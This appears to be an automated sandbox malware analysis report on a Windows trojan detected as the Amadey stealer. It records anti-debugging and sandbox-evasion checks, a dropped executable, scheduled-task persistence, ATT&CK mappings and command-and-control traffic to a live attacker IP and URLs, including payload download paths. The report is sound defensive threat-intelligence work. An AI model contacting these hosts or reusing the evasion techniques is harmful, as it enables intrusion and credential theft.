Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7552	Thread sleep time: -9750000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7796	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7608	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7592	Thread sleep count: 1342 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7592	Thread sleep time: -2685342s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000002.00000002.1740388137.00000000011F7000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000001.00000002.4114826750.0000000001783000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: axplong.exe, 00000001.00000002.4114826750.0000000001783000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.1701889360.0000000000557000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.4114242252.00000000011F7000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1740388137.00000000011F7000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\setup.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\setup.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04B2034E rdtsc

0_2_04B2034E

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_0103A1A2 mov eax, dword ptr fs:[00000030h]		1_2_0103A1A2
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 1_2_0103643B mov eax, dword ptr fs:[00000030h]		1_2_0103643B

Source: C:\Users\user\Desktop\setup.exe

Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 00000002.00000002.1740388137.00000000011F7000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: 5Program Manager

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 1_2_0101D2E8 cpuid

1_2_0101D2E8

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 1_2_0101CAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

1_2_0101CAED

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.axplong.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.axplong.exe.1000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.setup.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1699386717.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1701798029.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4114156950.0000000001001000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1740305349.0000000001001000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1699458271.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1661502263.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
setup.exe	73%	ReversingLabs	Win32.Trojan.Casdet
setup.exe	100%	Avira	TR/Crypt.TPM.Gen
setup.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	73%	ReversingLabs	Win32.Trojan.Casdet

Source	Detection	Scanner	Label
http://77.91.77.81/	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.php2	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.php	100%	Avira URL Cloud	malware
http://77.91.77.81/Kiru9gu/index.phpm32	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.phpR-	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.phpl	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.phpem32	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.phpoS	100%	Avira URL Cloud	phishing
http://77.91.77.81/Kiru9gu/index.phptI	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://77.91.77.81/Kiru9gu/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://77.91.77.81/	axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://77.91.77.81/Kiru9gu/index.phpR-	axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://77.91.77.81/Kiru9gu/index.phpl	axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://77.91.77.81/Kiru9gu/index.phpem32	axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://77.91.77.81/Kiru9gu/index.php2	axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://77.91.77.81/Kiru9gu/index.phpoS	axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://77.91.77.81/Kiru9gu/index.phpm32	axplong.exe, 00000001.00000002.4114826750.0000000001741000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://77.91.77.81/Kiru9gu/index.phptI	axplong.exe, 00000001.00000002.4114826750.0000000001768000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.91.77.81	unknown	Russian Federation		42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465704
Start date and time:	2024-07-02 00:24:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/3@0/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 7564 because there are no executed function
Execution Graph export aborted for target setup.exe, PID 7348 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: setup.exe

Simulations

Behavior and APIs

Time	Type	Description
18:25:02	API Interceptor	10993196x Sleep call for process: axplong.exe modified
23:25:01	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.91.77.81	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	77.91.77.81/stealc/random.exe
	Rnteb46TuM.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	8vZMEr8sm9.exe	Get hash	malicious	Amadey	Browse	77.91.77.81/stealc/random.exe
	1jPL5zru3u.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/mine/amadka.exe
	Zachv5lCuu.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	j7iUba2bki.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	77.91.77.81/stealc/random.exe
	ukuWaeRgPR.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/stealc/random.exe
	tAa6xNsucX.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.81/mine/amadka.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	77.91.77.80
	Rnteb46TuM.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	8vZMEr8sm9.exe	Get hash	malicious	Amadey	Browse	77.91.77.82
	1jPL5zru3u.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	Zachv5lCuu.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82
	1719520929.094843_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, Vidar	Browse	77.91.77.80
	file.exe	Get hash	malicious	Amadey	Browse	77.91.77.82
	installer.exe	Get hash	malicious	RisePro Stealer	Browse	77.91.77.66
	jYXfxdLoiV.pdf	Get hash	malicious	GRQ Scam	Browse	77.91.77.34
	j7iUba2bki.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	77.91.77.82

Process:	C:\Users\user\Desktop\setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1942016
Entropy (8bit):	7.950488194711155
Encrypted:	false
SSDEEP:	49152:6YyPZ96v5ohNyPiYPl5A7E2+P75+Zg6RenX1IAhTiz8wPT:kBSPiYNK7mP91/TOQ
MD5:	EAA443F37443CB7221D63E0891243384
SHA1:	D3242326B2AC1AE6E9817A49DF33C3A79E209AEE
SHA-256:	BEF6F82A9C4064F8639E804036F460BAFDD01EEC87A355E247775D315B76DB13
SHA-512:	8405C44C1EEA8578224EB6495F689D66E4E2F6503C0BF08D3C111E4E307603A35089649296EBF89B76D339C9517A83133B741C655097A9FE319F25AAE1F6AFDB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f..............................L...........@...........................M.....Y.....@.................................X...l.............................L.............................\.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...cykfsdxm.....@2.....................@...inbhqvty......L......\|..............@....taggant.0....L.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.4217877499171836
Encrypted:	false
SSDEEP:	6:VG9k61/XpRKUEZ+lX1YC7UPelkDdtPjgsW2YRZuy0l1sBEt0:VcfpRKQ1h7keeDHjzvYRQV1sit0
MD5:	E84EB3DFBD257D2FB19EA445429C8867
SHA1:	2BD433FA58463454DD24077F999E7C021CEFAAFF
SHA-256:	45B7EEBE01C9698DC07D67E81DACBA33DB24CA10BE607DDE5001166FA4918D16
SHA-512:	746E2E48F184222E43C4F40A0E30A870D26B03E0D9316EB9E279AE61CA0DBBE03C099A25C9F5EEB3B6485CC9F925ACD2A1B8412D76C5F0F900012639CEDF5751
Malicious:	false
Reputation:	low
Preview:	....K#H....F...F5b..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.8.2.5.4.6.2.4.2.4.3.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950488194711155
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setup.exe
File size:	1'942'016 bytes
MD5:	eaa443f37443cb7221d63e0891243384
SHA1:	d3242326b2ac1ae6e9817a49df33c3a79e209aee
SHA256:	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
SHA512:	8405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb
SSDEEP:	49152:6YyPZ96v5ohNyPiYPl5A7E2+P75+Zg6RenX1IAhTiz8wPT:kBSPiYNK7mP91/TOQ
TLSH:	D8953341EE619818C54DF57BE20837F70BD903DE301C9294D61713EEA9E3A99796383B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8ce000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x665ECF2A [Tue Jun 4 08:24:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F808CE7939Ah
jo 00007F808CE793B3h
add byte ptr [eax], al
jmp 00007F808CE7B395h
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a058	0x6c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4cc6ac	0x10	cykfsdxm
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4cc65c	0x18	cykfsdxm
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	88424d00171121c7b7dfe807dc783ef1	False	0.9983617230191257	data	7.984381286148552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	98d31dc711c36ab7d863c5c833f8e086	False	0.578125	data	4.579128846761863	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	6e66ae8f9a75bc604a087c954abf8737	False	0.15234375	data	1.0684380430289213	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b9000	0x200	2986a28d7f7e46b042e785f185ddc6fa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cykfsdxm	0x324000	0x1a9000	0x1a8a00	ea6be42942e2ff69970d4d81b5d0fbce	False	0.9944855985060347	data	7.954405328517533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
inbhqvty	0x4cd000	0x1000	0x400	c7defbf3f0eaa9ad94a957c8ec2213ee	False	0.7734375	data	6.108558188907066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ce000	0x3000	0x2200	5c28f16766972ae6017c3955dfa9fd62	False	0.06284466911764706	DOS executable (COM)	0.7560203790449809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4cc6bc	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-00:25:04.486423	TCP	2856147	ETPRO TROJAN Amadey CnC Activity M3	49730	80	192.168.2.4	77.91.77.81

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 00:25:04.478326082 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:04.485909939 CEST	80	49730	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:04.486056089 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:04.486423016 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:04.495362043 CEST	80	49730	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:05.210973024 CEST	80	49730	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:05.211033106 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.212826014 CEST	49730	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:05.220443964 CEST	80	49730	77.91.77.81	192.168.2.4
